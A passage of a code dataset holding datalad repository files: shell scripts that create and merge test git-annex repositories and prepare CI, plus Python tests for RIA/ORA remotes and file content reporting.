_UI messaging: https://github.com/datalad/datalad/blob/a8d7c63b763aacfbca15925bb1562a62b4448ea6/datalad/core/local/status.py#L438-L457" }, { "alpha_fraction": 0.6641094088554382, "alphanum_fraction": 0.674449622631073, "avg_line_length": 26.504587173461914, "blob_id": "93f8c0fc0f708136b607d2e85257d79b597eaa14", "content_id": "3efc01724ebfd29e22e3bc4e8d92f5ae4419fe3e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2998, "license_type": "permissive", "max_line_length": 89, "num_lines": 109, "path": "/tools/mimic_merges", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#emacs: -*- mode: shell-script; c-basic-offset: 4; tab-width: 4; indent-tabs-mode: t -*- \n#ex: set sts=4 ts=4 sw=4 noet:\n#\n#\n# COPYRIGHT: Yaroslav Halchenko 2014\n#\n# LICENSE: MIT\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\nset -eu\n\ndepth=5\n# precreate associative array with directory names\ndeclare -A dirs\ndirs[\"0\"]='.'\ndname=.\nfor d in `eval echo {1..$depth}`; do\n\techo $dname\n\tdname+=\"/d$d\"\n\tdirs[\"$d\"]=$dname\ndone\n\nfunction multi_branch {\n\tbranches=$1\n\tfiles_per_branch=$2\n annex=$3\n\techo \"Creating $branches branches with $files_per_branch per branch. 
annex=$annex\"\n\ti=0\n\tfor b in `eval echo {1..$branches}`; do\n\t\tgit co -b b$b master &> /dev/null\n\t\tfor f in `eval echo {1..$files_per_branch}`; do\n\t\t\t#echo -ne \"\\rFile $f\"\n\t\t\tfdepth=$(python -c \"print $i%$depth\")\n\t\t\tdname=${dirs[\"$fdepth\"]}\n\t\t\t#[ -e $dname ] || mkdir -p $dname\n\t\t\tfname=$dname/f$i.dat\n\t\t\techo \"file $i\" > $fname;\n\t\t\ti=$(($i+1))\n\t\tdone\n if [ $annex=1 ]; then\n git annex add * > /dev/null;\n else\n git add * > /dev/null\n fi\n\t\tgit commit -m \"commit in branch $b\" >/dev/null;\n\tdone\n\techo \"Merging\"\n\teval \"git merge -m 'merging $branches together' b{1..$branches}\" >/dev/null\n}\n\nfunction init_repo {\n\ttdir_=$1\n\tif [ -e $tdir_ ]; then\n\t\tchmod +w -R $tdir_\n\t\trm -r $tdir_ || :\n\tfi\n\tmkdir -p $tdir_\n\tcd $tdir_\n\tgit init\n\tgit annex init\n\ttouch .empty\n\tgit add .empty; git commit -m \"initial commit just to avoid dances with empty branches\"\n\t# precreate directories\n\tfor d in ${dirs[*]}; do\n\t\tmkdir -p $tdir_/$d\n\tdone\n}\n\nif [ $# -lt 2 ]; then\n\techo \"Usage: $0 nfiles_per_branch nbranches [tempdir]\"\n\texit 1\nfi\n\nfilespb=$1\nbr=$2\nfiles=$(python -c \"print $filespb*$br\")\n\nif [ $# -ge 3 ]; then\n\ttdir=$3\nelse\n\ttdir=/tmp/testdir\nfi\n\nannex=0\necho \"Temp path $tdir\"\ninit_repo $tdir/branches; cd $tdir/branches; time multi_branch $br $filespb $annex\ninit_repo $tdir/nobranches; cd $tdir/nobranches; time multi_branch 1 $files $annex\n\n#init_repo\n#time singe_branch\n" }, { "alpha_fraction": 0.6345177888870239, "alphanum_fraction": 0.6598984599113464, "avg_line_length": 16.81818199157715, "blob_id": "5a69ffcd9f21bd6264f9697664497ba47c5dfca5", "content_id": "b6ab9cf7be778b5a311675deaaed735c548f12c6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 197, "license_type": "permissive", "max_line_length": 62, "num_lines": 11, "path": "/tools/bisect-git-annex.scripts/bisect-git-annex-lock.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\nset -eu\n\nerr=\"thread blocked indefinitely\"\n\ncd ~/QA\ntimeout 5 git annex get -J2 sub-* 2>&1 | tee annex-get-log.txt\nif grep -q \"$err\" annex-get-log.txt; then\n\techo \"E: $err\"\n\texit 1\nfi\n\n" }, { "alpha_fraction": 0.7104895114898682, "alphanum_fraction": 0.7174825072288513, "avg_line_length": 36.6315803527832, "blob_id": "92201b783c024544d73cce186aaa66b029e05d61", "content_id": "942d61603f4545a9ee5ef759937504981a95c445", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 715, "license_type": "permissive", "max_line_length": 151, "num_lines": 19, "path": "/tools/ci/prep-travis-devel-annex.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e -u\n\n# configure\nsed -e 's,/debian ,/debian-devel ,g' /etc/apt/sources.list.d/neurodebian.sources.list | sudo tee /etc/apt/sources.list.d/neurodebian-devel.sources.list\nsudo apt-get update\n\n# check versions\n# devel:\ndevel_annex_version=$(apt-cache policy git-annex-standalone | grep -B1 '/debian-devel ' | awk '/ndall/{print $1;}')\ncurrent_annex_version=$(apt-cache policy git-annex-standalone | awk '/\\*\\*\\*/{print $2}')\n\nif dpkg --compare-versions \"$devel_annex_version\" gt \"$current_annex_version\"; then\n sudo apt-get install \"git-annex-standalone=$devel_annex_version\"\nelse\n echo \"I: devel version $devel_annex_version is not newer than installed 
$current_annex_version\"\n exit 99\nfi\n" }, { "alpha_fraction": 0.5920093655586243, "alphanum_fraction": 0.5984733700752258, "avg_line_length": 40.430198669433594, "blob_id": "768b165271f273d9795dfbb2134d50b2eb4683d8", "content_id": "f2c04d794272d37ceae4f56d093eacd0164721c0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14542, "license_type": "permissive", "max_line_length": 122, "num_lines": 351, "path": "/datalad/distributed/tests/test_ria_git_remote.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\n\nimport subprocess\n\nfrom datalad.api import (\n Dataset,\n clone,\n)\nfrom datalad.customremotes.ria_utils import (\n create_ds_in_store,\n create_store,\n get_layout_locations,\n)\nfrom datalad.distributed.ora_remote import (\n LocalIO,\n SSHRemoteIO,\n)\nfrom datalad.distributed.tests.ria_utils import (\n common_init_opts,\n populate_dataset,\n)\nfrom datalad.interface.results import annexjson2result\nfrom datalad.tests.utils_pytest import (\n assert_result_count,\n assert_status,\n eq_,\n known_failure_windows,\n skip_ssh,\n slow,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n quote_cmdlinearg,\n)\n\n\n@known_failure_windows # see gh-4469\n@with_tempfile()\n@with_tempfile(mkdir=True)\ndef _test_bare_git_version_1(host, dspath, store):\n # This test should take a dataset and create a bare repository at the remote\n # end from it.\n # Given, that it is placed correctly within a tree of dataset, that remote\n # thing should then be usable as an ora-remote as well as as a git-type\n # remote.\n # Note: Usability of git remote by annex depends on dataset layout version\n # (dirhashlower vs. -mixed).\n # For version 1 (lower) upload and consumption should be\n # interchangeable. 
It doesn't matter which remote is used for what\n # direction.\n ds_path = Path(dspath)\n store = Path(store)\n ds = Dataset(ds_path).create()\n populate_dataset(ds)\n\n bare_repo_path, _, objdir = get_layout_locations(1, store, ds.id)\n # Use git to make sure the remote end is what git thinks a bare clone of it\n # should look like\n subprocess.run(['git', 'clone', '--bare',\n quote_cmdlinearg(str(dspath)),\n quote_cmdlinearg(str(bare_repo_path))\n ])\n\n if host:\n url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n url = \"ria+{}\".format(store.as_uri())\n init_opts = common_init_opts + ['url={}'.format(url)]\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n create_store(io, store, '1')\n # set up the dataset location, too.\n # Note: Dataset layout version 1 (dirhash lower):\n create_ds_in_store(io, store, ds.id, '1', '1', init_obj_tree=False)\n\n # Now, let's have the bare repo as a git remote and use it with annex\n git_url = \"ssh://{host}{path}\".format(host=host, path=bare_repo_path) \\\n if host else bare_repo_path.as_uri()\n ds.repo.add_remote('bare-git', git_url)\n ds.repo.enable_remote('bare-git')\n\n # copy files to the remote\n ds.push('.', to='bare-git')\n eq_(len(ds.repo.whereis('one.txt')), 2)\n\n # now we can drop all content locally, reobtain it, and survive an\n # fsck\n ds.drop('.')\n ds.get('.')\n assert_status('ok', [annexjson2result(r, ds) for r in ds.repo.fsck()])\n\n # Now, add the ora remote:\n ds.repo.init_remote('ora-remote', options=init_opts)\n # fsck to make availability known\n assert_status(\n 'ok',\n [annexjson2result(r, ds)\n for r in ds.repo.fsck(remote='ora-remote', fast=True)])\n eq_(len(ds.repo.whereis('one.txt')), 3)\n\n # Now move content from git-remote to local and see it not being available\n # via bare-git anymore.\n ds.repo.call_annex(['move', '--all', '--from=bare-git'])\n # ora-remote doesn't know yet:\n eq_(len(ds.repo.whereis('one.txt')), 2)\n\n # But after fsck it does:\n fsck_res = [annexjson2result(r, ds)\n for r in ds.repo.fsck(remote='ora-remote', fast=True)]\n assert_result_count(fsck_res,\n 1,\n status='error',\n error_message='** Based on the location log, one.txt\\n'\n '** was expected to be present, '\n 'but its content is missing.')\n assert_result_count(fsck_res,\n 1,\n status='error',\n error_message='** Based on the location log, subdir/two\\n'\n '** was expected to be present, '\n 'but its content is missing.')\n eq_(len(ds.repo.whereis('one.txt')), 1)\n # and the other way around: upload via ora-remote and have it available via\n # git-remote:\n ds.push('.', to='ora-remote')\n # fsck to make availability known\n assert_status(\n 'ok',\n [annexjson2result(r, ds)\n for r in ds.repo.fsck(remote='bare-git', fast=True)])\n eq_(len(ds.repo.whereis('one.txt')), 3)\n\n\n@slow # 12sec + ? on travis\ndef test_bare_git_version_1():\n # TODO: Skipped due to gh-4436\n known_failure_windows(skip_ssh(_test_bare_git_version_1))('datalad-test')\n _test_bare_git_version_1(None)\n\n\n@known_failure_windows # see gh-4469\n@with_tempfile()\n@with_tempfile(mkdir=True)\ndef _test_bare_git_version_2(host, dspath, store):\n # Similarly to test_bare_git_version_1, this should ensure a bare git repo\n # at the store location for a dataset doesn't conflict with the ORA remote.\n # Note: Usability of git remote by annex depends on dataset layout version\n # (dirhashlower vs. -mixed).\n # For version 2 (mixed) upload via ORA and consumption via git should\n # work. 
But not the other way around, since git-annex uses\n # dirhashlower with bare repos.\n\n ds_path = Path(dspath)\n store = Path(store)\n ds = Dataset(ds_path).create()\n populate_dataset(ds)\n\n bare_repo_path, _, objdir = get_layout_locations(1, store, ds.id)\n # Use git to make sure the remote end is what git thinks a bare clone of it\n # should look like\n subprocess.run(['git', 'clone', '--bare',\n quote_cmdlinearg(str(dspath)),\n quote_cmdlinearg(str(bare_repo_path))\n ])\n\n if host:\n url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n url = \"ria+{}\".format(store.as_uri())\n init_opts = common_init_opts + ['url={}'.format(url)]\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n create_store(io, store, '1')\n # set up the dataset location, too.\n # Note: Dataset layout version 2 (dirhash mixed):\n create_ds_in_store(io, store, ds.id, '2', '1')\n # Avoid triggering a git-annex safety check. See gh-5253.\n assert objdir.is_absolute()\n io.remove_dir(objdir)\n\n # Now, let's have the bare repo as a git remote\n git_url = \"ssh://{host}{path}\".format(host=host, path=bare_repo_path) \\\n if host else bare_repo_path.as_uri()\n ds.repo.add_remote('bare-git', git_url)\n ds.repo.enable_remote('bare-git')\n # and the ORA remote in addition:\n ds.repo.init_remote('ora-remote', options=init_opts)\n # upload keys via ORA:\n ds.push('.', to='ora-remote')\n # bare-git doesn't know yet:\n eq_(len(ds.repo.whereis('one.txt')), 2)\n # fsck to make availability known\n assert_status(\n 'ok',\n [annexjson2result(r, ds)\n for r in ds.repo.fsck(remote='bare-git', fast=True)])\n eq_(len(ds.repo.whereis('one.txt')), 3)\n ds.drop('.')\n eq_(len(ds.repo.whereis('one.txt')), 2)\n # actually consumable via git remote:\n ds.repo.call_annex(['move', 'one.txt', '--from', 'bare-git'])\n eq_(len(ds.repo.whereis('one.txt')), 2)\n # now, move back via git - shouldn't be consumable via ORA\n ds.repo.call_annex(['move', 'one.txt', '--to', 'bare-git'])\n # fsck to make availability known, but there's nothing from POV of ORA:\n fsck_res = [annexjson2result(r, ds)\n for r in ds.repo.fsck(remote='ora-remote', fast=True)]\n assert_result_count(fsck_res,\n 1,\n status='error',\n error_message='** Based on the location log, one.txt\\n'\n '** was expected to be present, '\n 'but its content is missing.')\n assert_result_count(fsck_res, 3, status='ok')\n eq_(len(fsck_res), 4)\n eq_(len(ds.repo.whereis('one.txt')), 1)\n\n\n@slow # 13sec + ? on travis\ndef test_bare_git_version_2():\n # TODO: Skipped due to gh-4436\n known_failure_windows(skip_ssh(_test_bare_git_version_2))('datalad-test')\n _test_bare_git_version_2(None)\n\n# TODO: Outcommented \"old\" test from git-annex-ria-remote. This one needs to be\n# revisited after RF'ing to base ORA on proper command abstractions for\n# remote execution\n\n# @skip_if_on_windows\n# @with_tempfile\n# @with_tempfile(mkdir=True)\n# @serve_path_via_http\n# @with_tempfile\n# @with_tempfile\n# @with_tempfile(mkdir=True)\n# def test_create_as_bare(origin=None, remote_base_path=None, remote_base_url=None, public=None,\n# consumer=None, tmp_location=None):\n#\n# # Note/TODO: Do we need things like:\n# # git config receive.denyCurrentBranch updateInstead\n# # mv .hooks/post-update.sample hooks/post-update\n# # git update-server-info\n#\n# # Test how we build a riaremote from an existing dataset, that is a bare git repo and can be accessed as a git type\n# # remote as well. 
This should basically outline how to publish to that kind of structure as a data store, that is\n# # autoenabled, so we can publish to github/gitlab and make that storage known.\n#\n# remote_base_path = Path(remote_base_path)\n#\n# ds = create(origin)\n# populate_dataset(ds)\n# assert_repo_status(ds.path)\n#\n# # add the ria remote:\n# # Note: For serve_path_via_http to work (which we need later), the directory needs to already exist.\n# # But by default ORARemote will reject to create the remote structure in an already existing directory,\n# # that wasn't created by itself (lacks as ria-layout-version file).\n# # So, we can either configure force-write here or put a version file in it beforehand.\n# # However, this is specific to the test environment!\n# with open(str(remote_base_path / 'ria-layout-version'), 'w') as f:\n# f.write('1')\n# initexternalremote(ds.repo, 'riaremote', 'ora', config={'base-path': str(remote_base_path)})\n# # pretty much any annex command that talks to that remote should now trigger the actual creation on the remote end:\n# assert_status(\n# 'ok',\n# [annexjson2result(r, ds)\n# for r in ds.repo.fsck(remote='riaremote', fast=True)])\n#\n# remote_dataset_path = remote_base_path / ds.id[:3] / ds.id[3:]\n#\n# assert remote_base_path.exists()\n# assert remote_dataset_path.exists()\n# ds.push('.', to='riaremote')\n#\n# # Now, let's make the remote end a valid, bare git repository\n# eq_(subprocess.run(['git', 'init', '--bare'], cwd=str(remote_dataset_path)).returncode,\n# 0)\n#\n# #subprocess.run(['mv', 'hooks/post-update.sample', 'hooks/post-update'], cwd=remote_dataset_path)\n# #subprocess.run(['git', 'update-server-info'], cwd=remote_dataset_path)\n#\n# # TODO: we might need \"mv .hooks/post-update.sample hooks/post-update\", \"git update-server-info\" as well\n# # add as git remote and push everything\n# eq_(subprocess.run(['git', 'remote', 'add', 'bare-git', str(remote_dataset_path)], cwd=origin).returncode,\n# 0)\n# # Note: \"--mirror\" does the job for this test, while it might not be a good default some kind of\n# # datalad-create-sibling. However those things need to be configurable for actual publish/creation routine anyway\n# eq_(subprocess.run(['git', 'push', '--mirror', 'bare-git'], cwd=origin).returncode,\n# 0)\n#\n# # annex doesn't know the bare-git remote yet:\n# eq_(len(ds.repo.whereis('one.txt')), 2)\n# # But after enableremote and a fsck it does:\n# eq_(subprocess.run(['git', 'annex', 'enableremote', 'bare-git'], cwd=origin).returncode,\n# 0)\n# assert_status(\n# 'ok',\n# [annexjson2result(r, ds)\n# for r in ds.repo.fsck(remote='bare-git', fast=True)])\n# eq_(len(ds.repo.whereis('one.txt')), 3)\n#\n# # we can drop and get again via 'bare-git' remote:\n# ds.drop('.')\n# eq_(len(ds.repo.whereis('one.txt')), 2)\n# eq_(subprocess.run(['git', 'annex', 'get', 'one.txt', '--from', 'bare-git'], cwd=origin).returncode,\n# 0)\n# eq_(len(ds.repo.whereis('one.txt')), 3)\n# # let's get the other one from riaremote\n# eq_(len(ds.repo.whereis(op.join('subdir', 'two'))), 2)\n# eq_(subprocess.run(['git', 'annex', 'get', op.join('subdir', 'two'), '--from', 'riaremote'], cwd=origin).returncode,\n# 0)\n# eq_(len(ds.repo.whereis(op.join('subdir', 'two'))), 3)\n#\n# raise SkipTest(\"NOT YET DONE\")\n# # TODO: Part below still doesn't work. \"'storage' is not available\" when trying to copy to it. May be the HTTP\n# # Server is not available from within the context of the git-type special remote? 
Either way, still smells like an\n# # issue with the f****** test setup.\n#\n#\n#\n# # Now, let's try make it a data store for datasets available from elsewhere (like github or gitlab):\n# # For this test, we need a second git remote pointing to remote_dataset_path, but via HTTP.\n# # This is because annex-initremote for a git-type special remote requires a git remote pointing to the same location\n# # and it fails to match local paths. Also doesn't work with file:// scheme.\n# #\n# # TODO: Figure it out in detail. That issue is either a bug or not \"real\".\n# #\n# # ds.repo._allow_local_urls()\n# # dataset_url = remote_base_url + ds.id[:3] + '/' + ds.id[3:] + '/'\n# # eq_(subprocess.run(['git', 'remote', 'add', 'datasrc', dataset_url],\n# # cwd=origin).returncode,\n# # 0)\n# # eq_(subprocess.run(['git', 'annex', 'initremote', 'storage', 'type=git',\n# # 'location={}'.format(dataset_url), 'autoenable=true'],\n# # cwd=origin).returncode,\n# # 0)\n# # assert_status(\n# # 'ok',\n# # [annexjson2result(r, ds)\n# # for r in fsck(ds.repo, remote='storage', fast=True)])\n" }, { "alpha_fraction": 0.6054096817970276, "alphanum_fraction": 0.6075311303138733, "avg_line_length": 37.479591369628906, "blob_id": "bbe1685ed58288a093751b23257e12c19b17292d", "content_id": "739130044659bfec5aeec09d50877c0c68d4b95b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15084, "license_type": "permissive", "max_line_length": 92, "num_lines": 392, "path": "/datalad/support/tests/test_fileinfo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test file info getters\"\"\"\n\n\nimport os.path as op\nfrom pathlib import Path\n\nimport datalad.utils as ut\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.exceptions import NoSuchPathError\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n assert_dict_equal,\n assert_equal,\n assert_false,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n get_annexstatus,\n get_convoluted_situation,\n known_failure_githubci_win,\n on_nfs,\n on_travis,\n slow,\n skip_if,\n with_tempfile,\n with_tree,\n)\n\n\n@slow # 10sec on travis\n@known_failure_githubci_win\n@with_tempfile\ndef test_get_content_info(path=None):\n repo = GitRepo(path)\n assert_equal(repo.get_content_info(), {})\n # an invalid reference causes an exception\n assert_raises(ValueError, repo.get_content_info, ref='HEAD')\n\n ds = get_convoluted_situation(path)\n repopath = ds.repo.pathobj\n\n assert_equal(ds.repo.pathobj, repopath)\n assert_equal(ds.pathobj, ut.Path(path))\n\n # verify general rules on fused info records that are incrementally\n # assembled: for git content info, amended with annex info on 'HEAD'\n # (to get the last committed stage and with it possibly vanished\n # content), and lastly annex info wrt to the present worktree, to\n # also get info on added/staged content\n # this fuses the info reported from\n # - git ls-files\n # - git annex findref HEAD\n # - git annex find --include '*'\n for f, r in get_annexstatus(ds.repo).items():\n if f.match('*_untracked'):\n assert(r.get('gitshasum', None) is None)\n if 
f.match('*_deleted'):\n assert(not f.exists() and not f.is_symlink() is None)\n if f.match('subds_*'):\n assert(r['type'] == 'dataset' if r.get('gitshasum', None) else 'directory')\n if f.match('file_*'):\n # which one exactly depends on many things\n assert_in(r['type'], ('file', 'symlink'))\n if f.match('file_ingit*'):\n assert(r['type'] == 'file')\n elif '.datalad' not in f.parts and not f.match('.git*') and \\\n r.get('gitshasum', None) and not f.match('subds*'):\n # this should be known to annex, one way or another\n # regardless of whether things add deleted or staged\n # or anything in between\n assert_in('key', r, f)\n assert_in('keyname', r, f)\n assert_in('backend', r, f)\n assert_in('bytesize', r, f)\n # no duplication with path\n assert_not_in('file', r, f)\n\n # query full untracked report\n res = ds.repo.get_content_info()\n assert_in(repopath.joinpath('dir_untracked', 'file_untracked'), res)\n assert_not_in(repopath.joinpath('dir_untracked'), res)\n # query for compact untracked report\n res = ds.repo.get_content_info(untracked='normal')\n assert_not_in(repopath.joinpath('dir_untracked', 'file_untracked'), res)\n assert_in(repopath.joinpath('dir_untracked'), res)\n # query no untracked report\n res = ds.repo.get_content_info(untracked='no')\n assert_not_in(repopath.joinpath('dir_untracked', 'file_untracked'), res)\n assert_not_in(repopath.joinpath('dir_untracked'), res)\n\n # git status integrity\n status = ds.repo.status()\n for t in ('subds', 'file'):\n for s in ('untracked', 'added', 'deleted', 'clean',\n 'ingit_clean', 'dropped_clean', 'modified',\n 'ingit_modified'):\n for l in ('', ut.PurePosixPath('subdir', '')):\n if t == 'subds' and 'ingit' in s or 'dropped' in s:\n # invalid combination\n continue\n if t == 'subds' and s == 'deleted':\n # same as subds_unavailable -> clean\n continue\n p = repopath.joinpath(l, '{}_{}'.format(t, s))\n assert p.match('*_{}'.format(status[p]['state'])), p\n if t == 'subds':\n assert_in(status[p]['type'], ('dataset', 'directory'), p)\n else:\n assert_in(status[p]['type'], ('file', 'symlink'), p)\n\n # git annex status integrity\n annexstatus = get_annexstatus(ds.repo)\n for t in ('file',):\n for s in ('untracked', 'added', 'deleted', 'clean',\n 'ingit_clean', 'dropped_clean', 'modified',\n 'ingit_modified'):\n for l in ('', ut.PurePosixPath('subdir', '')):\n p = repopath.joinpath(l, '{}_{}'.format(t, s))\n if s in ('untracked', 'ingit_clean', 'ingit_modified'):\n # annex knows nothing about these things\n assert_not_in('key', annexstatus[p])\n continue\n assert_in('key', annexstatus[p])\n # dear future,\n # if the next one fails, git-annex might have changed the\n # nature of the path that are being reported by\n # `annex find --json`\n # when this was written `hashir*` was a native path, but\n # `file` was a POSIX path\n assert_equal(annexstatus[p]['has_content'], 'dropped' not in s)\n\n # check the different subds evaluation modes\n someds = Dataset(ds.pathobj / 'subds_modified' / 'someds')\n dirtyds_path = someds.pathobj / 'dirtyds'\n assert_not_in(\n 'state',\n someds.repo.status(eval_submodule_state='no')[dirtyds_path]\n )\n assert_equal(\n 'clean',\n someds.repo.status(eval_submodule_state='commit')[dirtyds_path]['state']\n )\n assert_equal(\n 'modified',\n someds.repo.status(eval_submodule_state='full')[dirtyds_path]['state']\n )\n\n\n\n@with_tempfile\ndef test_compare_content_info(path=None):\n # TODO remove when `create` is RF to return the new Dataset\n ds = Dataset(path).create()\n assert_repo_status(path)\n\n # for a clean 
repo HEAD and worktree query should yield identical results\n # minus a 'bytesize' report that is readily available for HEAD, but would\n # not a stat call per file for the worktree, and is not done ATM\n wt = ds.repo.get_content_info(ref=None)\n assert_dict_equal(\n wt,\n {f: {k: v for k, v in p.items() if k != 'bytesize'}\n for f, p in ds.repo.get_content_info(ref='HEAD').items()}\n )\n\n\n@with_tempfile\ndef test_subds_path(path=None):\n # a dataset with a subdataset with a file, all neatly tracked\n ds = Dataset(path).create()\n subds = ds.create('sub')\n assert_repo_status(path)\n with (subds.pathobj / 'some.txt').open('w') as f:\n f.write(u'test')\n ds.save(recursive=True)\n assert_repo_status(path)\n\n # querying the toplevel dataset repo for a subdspath should\n # report the subdataset record in the dataset\n # (unlike `git status`, which is silent for subdataset paths),\n # but definitely not report the subdataset as deleted\n # https://github.com/datalad/datalad-revolution/issues/17\n stat = ds.repo.status(paths=[op.join('sub', 'some.txt')])\n assert_equal(list(stat.keys()), [subds.repo.pathobj])\n assert_equal(stat[subds.repo.pathobj]['state'], 'clean')\n\n\n@skip_if(on_travis and on_nfs) # TODO. stalls https://github.com/datalad/datalad/pull/7372\n@with_tempfile\ndef test_report_absent_keys(path=None):\n ds = Dataset(path).create()\n # create an annexed file\n testfile = ds.pathobj / 'dummy'\n testfile.write_text(u'nothing')\n ds.save()\n # present in a full report and in a partial report\n # based on worktree of HEAD ref\n for ai in (\n ds.repo.get_content_annexinfo(eval_availability=True),\n ds.repo.get_content_annexinfo(\n paths=['dummy'],\n eval_availability=True),\n ds.repo.get_content_annexinfo(\n ref='HEAD',\n eval_availability=True),\n ds.repo.get_content_annexinfo(\n ref='HEAD',\n paths=['dummy'],\n eval_availability=True)):\n assert_in(testfile, ai)\n assert_equal(ai[testfile]['has_content'], True)\n # drop the key, not available anywhere else\n ds.drop('dummy', reckless='kill')\n # does not change a thing, except the key is gone\n for ai in (\n ds.repo.get_content_annexinfo(eval_availability=True),\n ds.repo.get_content_annexinfo(\n paths=['dummy'],\n eval_availability=True),\n ds.repo.get_content_annexinfo(\n ref='HEAD',\n eval_availability=True),\n ds.repo.get_content_annexinfo(\n ref='HEAD',\n paths=['dummy'],\n eval_availability=True)):\n assert_in(testfile, ai)\n assert_equal(ai[testfile]['has_content'], False)\n # make sure files with URL keys are correctly reported:\n from datalad.conftest import test_http_server\n remote_file_name = 'imaremotefile.dat'\n local_file_name = 'mehasurlkey'\n (Path(test_http_server.path) / remote_file_name).write_text(\"weee\")\n remote_file_url = f'{test_http_server.url}/{remote_file_name}'\n # we need to get a file with a URL key and check its local availability\n ds.repo.call_annex(['addurl', '--relaxed', remote_file_url, '--file',\n local_file_name])\n ds.save(\"URL keys!\")\n # should not be there\n res = ds.repo.get_file_annexinfo(local_file_name, eval_availability=True)\n assert_equal(res['has_content'], False)\n ds.get(local_file_name)\n # should be there\n res = ds.repo.get_file_annexinfo(local_file_name, eval_availability=True)\n assert_equal(res['has_content'], True)\n\n\n@with_tempfile\ndef test_annexinfo_init(path=None):\n ds = Dataset(path).create()\n foo = ds.pathobj / \"foo\"\n foo_cont = b\"foo content\"\n foo.write_bytes(foo_cont)\n bar = ds.pathobj / \"bar\"\n bar.write_text(u\"bar content\")\n ds.save()\n\n # 
Custom init limits report, with original dict getting updated.\n cinfo_custom_init = ds.repo.get_content_annexinfo(\n init={foo: {\"bytesize\": 0,\n \"this-is-surely-only-here\": \"right?\"}})\n assert_not_in(bar, cinfo_custom_init)\n assert_in(foo, cinfo_custom_init)\n assert_equal(cinfo_custom_init[foo][\"bytesize\"], len(foo_cont))\n assert_equal(cinfo_custom_init[foo][\"this-is-surely-only-here\"],\n \"right?\")\n\n # \"git\" injects get_content_info() values.\n cinfo_init_git = ds.repo.get_content_annexinfo(init=\"git\")\n assert_in(\"gitshasum\", cinfo_init_git[foo])\n\n # init=None, on the other hand, does not.\n cinfo_init_none = ds.repo.get_content_annexinfo(init=None)\n assert_in(foo, cinfo_init_none)\n assert_in(bar, cinfo_init_none)\n assert_not_in(\"gitshasum\", cinfo_init_none[foo])\n\n\n@with_tempfile\ndef test_info_path_inside_submodule(path=None):\n ds = Dataset(path).create()\n subds = ds.create(\"submod\")\n foo = (subds.pathobj / \"foo\")\n foo.write_text(\"foo\")\n ds.save(recursive=True)\n cinfo = ds.repo.get_content_info(\n ref=\"HEAD\", paths=[foo.relative_to(ds.pathobj)])\n assert_in(\"gitshasum\", cinfo[subds.pathobj])\n\n\n@with_tempfile\ndef test_get_content_info_dotgit(path=None):\n ds = Dataset(path).create()\n # Files in .git/ won't be reported, though this takes a kludge on our side\n # before Git 2.25.\n assert_false(ds.repo.get_content_info(paths=[op.join(\".git\", \"config\")]))\n\n\n@with_tempfile\ndef test_get_content_info_paths_empty_list(path=None):\n ds = Dataset(path).create()\n\n # Unlike None, passing any empty list as paths to get_content_info() does\n # not report on all content.\n assert_false(ds.repo.get_content_info(paths=[]))\n assert_false(ds.repo.get_content_info(paths=[], ref=\"HEAD\"))\n\n # Add annex content to make sure its not reported.\n (ds.pathobj / \"foo\").write_text(\"foo\")\n ds.save()\n\n # Same for get_content_annexinfo()...\n assert_false(ds.repo.get_content_annexinfo(paths=[]))\n assert_false(ds.repo.get_content_annexinfo(paths=[], init=None))\n assert_false(ds.repo.get_content_annexinfo(paths=[], ref=\"HEAD\"))\n assert_false(\n ds.repo.get_content_annexinfo(paths=[], ref=\"HEAD\", 